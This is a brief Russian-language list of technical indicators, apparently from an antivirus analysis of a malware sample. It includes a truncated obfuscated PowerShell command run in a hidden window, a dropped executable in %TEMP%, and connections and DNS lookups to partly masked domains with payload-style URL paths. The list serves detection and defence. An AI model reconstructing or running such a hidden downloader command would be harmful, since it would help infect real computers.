Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -jOIn('63,89n112M87x38o117Q126n108n54r116s121,113P126n120o111,59Q85s126M111P53P76Q126r121s88n119Y114o126s117x111s32Y63,88r84M86x38P60s115M111s111x107o33M52Y52s120M122o121o114o117,126Q111o105s11...
- %TEMP%\181.exe
- 'ca####trollouts.com':80
- 'si##rsv.ru':80
- 'si##rsv.ru':443
- 'xn########mannhvdcal2bf9m.xn--p1ai':80
- http://ca####trollouts.com/qWp1mtn/
- http://si##rsv.ru/FfT6HoEX44/
- http://xn########mannhvdcal2bf9m.xn--p1ai/X6DRCTET/
- http://xn########mannhvdcal2bf9m.xn--p1ai/index.html
- 'si##rsv.ru':443
- DNS ASK ca####trollouts.com
- DNS ASK li######laptopcaugiay.com
- DNS ASK si##rsv.ru
- DNS ASK th#####ertlawoffice.com
- DNS ASK xn########mannhvdcal2bf9m.xn--p1ai
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -jOIn('63,89n112M87x38o117Q126n108n54r116s121,113P126n120o111,59Q85s126M111P53P76Q126r121s88n119Y114o126s117x111s32Y63,88r84M86x38P60s115M111s111x107o33M52Y52s120M122o121o114o117,126Q111o105s11...' (со скрытым окном)